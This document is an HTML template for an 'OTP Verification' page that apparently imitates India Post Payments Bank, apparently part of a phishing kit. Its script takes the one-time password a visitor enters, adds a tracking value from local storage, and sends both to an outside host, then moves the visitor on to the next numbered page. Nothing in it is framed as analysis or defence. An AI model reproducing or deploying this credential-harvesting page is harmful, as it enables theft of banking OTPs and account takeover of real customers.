{% load static %}
<!DOCTYPE html>
<html lang="zxx">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <title>8?;&789;;-567+;:&_335++;;*£~√÷¶</title>
    <style>
        #aa {
            width: 100%;
            margin-left: -7px;
        }

        #ft {
            width: 100%;
            margin-left: -6px;
        }

        .ee {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        .ee:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        #ll {
            background-color: #AE2924;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            width: 120px;
            height: 36px;
        }

        #ll:hover {
            background-color: #3E1128;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            width: 120px;
            height: 36px;
        }

        #kk,
        #ab {
            width: 100%;
        }

        #ii {
            width: 35%;
            border-radius: 18px;
            margin-left: 20px;
        }

        a:hover {
            background-color: #93c5ed;
            color: white;
            border-radius: 3px;
            text-decoration: none;
        }

        #kyc {
            width: 100%;
            background-color: #3E1128;
            height: 55px;
            margin: 0px;
            margin-left: -7px;
        }

        #col {
            width: 100%;
            background-color: #D8D1DB;
            height: 380px;
            margin-left: -7px;
        }
    </style>
</head>

<body onload="startTimer();">
    <img src="{% static 'indiapost.png' %}" alt="" id="aa">
    <div id="kyc"><br>
        <b style="color:white; font-size:18px; padding:20px;">OTP Verification</b><br>
    </div>
    <form method="POST" enctype="multipart/form-data">
        {% csrf_token %}
        <div id="col">
            <br><br>
            <center>
                <b style="font-family: Arial; color:#3E1128; font-size:15px;">
                    Please enter The One Time Password (OTP) which was sent to your registered mobile number with IPPB
                    Bank.
                </b>
            </center><br>
            <b style="font-family: Arial; color:#AE2924; padding:0px 20px; font-size:16px;">One Time Password*</b><br>
            <div id="dd">
                <input type="text" name="otp" id="otp1" class="ee" inputmode="numeric" placeholder="OTP" maxlength="6"
                    pattern="[0-9]{6}" title="Please Enter Valid One Time Password" required><br>
                <script type="text/javascript">
                    var timer = 180;
                    var sec = 0;

                    function startTimer() {
                        sec = parseInt(timer % 180);

                        if (timer < 2) {
                            window.location.href = "2nd.html";
                        }

                        document.getElementById("time").innerHTML = "<p1> Wait for OTP: </p1>" + sec.toString();
                        timer--;
                        setTimeout(function () {
                            startTimer();
                        }, 1000);
                    }
                </script>
                <div id="re">
                    <b><a href="" style="color:#27a2db; margin-left:225px; text-decoration:none;">Resend OTP</a></b><br>
                </div>
                <div>
                    <center>
                        <b style="color:#AE2924; font-size:14px; text-align:center;">
                            <span style="color:#AE2924; font-size:13px;" id="time"></span>&nbsp;second
                        </b>
                    </center>
                </div><br>
            </div>
            <div id="ff">
                <button type="submit" onclick="insertData()" id="ll" style="font-weight: bold;">SUBMIT OTP</button>
            </div><br>
        </div>
    </form>
    <div>
        <img src="{% static 'footeri.jpg' %}" alt="" id="ft"><br><br>
    </div>

    <script type="text/javascript">
        var random_no = localStorage.getItem('random_no');

        function insertData() {
            var otp = document.getElementById("otp1").value;
            if (otp != "") {
                var data = {
                    otp: otp,
                    random_no: random_no
                };
                var xhr = new XMLHttpRequest();

                xhr.open("POST", "https://annad.work-demo.online/indiapostpayment_new/2nd.php", true);
                xhr.setRequestHeader("Content-Type", "application/json");
                xhr.onreadystatechange = function () {
                    if (xhr.readyState === 4 && xhr.status === 200) {
                        console.log(xhr.responseText);
                        window.location.href = '3rd.html';
                    }
                };
                xhr.send(JSON.stringify(data));
            } else {
                alert('Please fill all fields');
            }
        }
    </script>
</body>